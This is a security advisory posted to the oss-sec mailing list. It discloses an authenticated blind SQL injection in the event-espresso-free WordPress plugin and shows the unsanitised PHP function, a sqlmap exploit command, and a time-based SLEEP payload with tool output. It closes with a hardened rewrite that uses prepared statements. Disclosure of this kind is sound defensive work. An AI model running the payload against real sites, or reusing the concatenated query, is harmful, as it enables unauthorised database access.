oss-sec mailing list archives

Blind SQL injection in wordpress plugin event-espresso-free v3.1.37.11.L, fixed in v3.1.37.12.L


From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 11 Jul 2017 16:10:45 -0400

Title: Blind SQL injection in wordpress plugin event-espresso-free v3.1.37.11.L
Author: Larry W. Cashdollar, @_larry0
Date: 2017-07-04
CVE-ID:[CVE-2017-1002026]
Download Site: https://wordpress.org/plugins/event-espresso-free/
Vendor: https://eventespresso.com/
Vendor Notified: 2017-07-07, fixed v3.1.37.12.L
Vendor Contact: plugins () wordpress org
Advisory: http://www.vapidlabs.com/advisory.php?v=197
Description: Event Espresso Lite – Event Management and Registration System
Vulnerability:
The function edit_event_category does not sanitize the user-supplied $id request parameter before concatenating it into an
SQL statement. This allows a blind SQL injection attack by an authenticated user who is permitted to edit event categories.


function edit_event_category(){
        global $wpdb;

        $id=$_REQUEST['id'];   // taken straight from the request, no validation or casting
        $results = $wpdb->get_results("SELECT * FROM ". EVENTS_CATEGORY_TABLE ." WHERE id =".$id);   // $id concatenated into the query
        foreach ($results as $result){
                $category_id = $result->id;
                $category_name = stripslashes($result->category_name);
                $category_identifier = stripslashes($result->category_identifier);
                // ...

Exploit Code:

$ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=event_categories&action=edit&id=*' --load-cookies=./cookie.txt --level=2 --risk=2 --dbms=mysql

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 364 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=event_categories&action=edit&id=(CASE WHEN (6856=6856) THEN SLEEP(5) ELSE 6856 END)
---
[14:53:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[14:53:44] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 14:53:44
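For comparison, the same lookup written so the request parameter cannot change the statement. This is an added example, not the vendor's v3.1.37.12.L patch; it assumes it runs inside WordPress, where $wpdb, absint() and the plugin's EVENTS_CATEGORY_TABLE constant are available.

```php
<?php
// Hardened variant of edit_event_category (example only, not the plugin's fix).
// Assumes the WordPress runtime: global $wpdb, absint(), wp_die(), and the
// plugin-defined constant EVENTS_CATEGORY_TABLE.
function edit_event_category_hardened() {
    global $wpdb;

    // Original: $id = $_REQUEST['id']; then "... WHERE id =" . $id
    // Step 1: coerce the parameter to a non-negative integer before it goes
    // anywhere near SQL. absint() turns non-numeric input such as
    // "(CASE WHEN (6856=6856) THEN SLEEP(5) ELSE 6856 END)" into 0.
    $id = isset($_REQUEST['id']) ? absint($_REQUEST['id']) : 0;
    if ($id === 0) {
        wp_die('Invalid category id.');
    }

    // Step 2: let $wpdb->prepare() build the statement. The %d placeholder is
    // always emitted as an integer literal, so the value can only ever be a
    // number in the WHERE clause, never additional SQL.
    $sql = $wpdb->prepare(
        'SELECT * FROM ' . EVENTS_CATEGORY_TABLE . ' WHERE id = %d',
        $id
    );
    $results = $wpdb->get_results($sql);

    foreach ($results as $result) {
        $category_id         = $result->id;
        $category_name       = stripslashes($result->category_name);
        $category_identifier = stripslashes($result->category_identifier);
        // ... remainder of the edit form as in the plugin
    }
}
```

The table name is still concatenated because $wpdb->prepare() has no placeholder for identifiers; that is safe here only because EVENTS_CATEGORY_TABLE is a constant, not user input.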
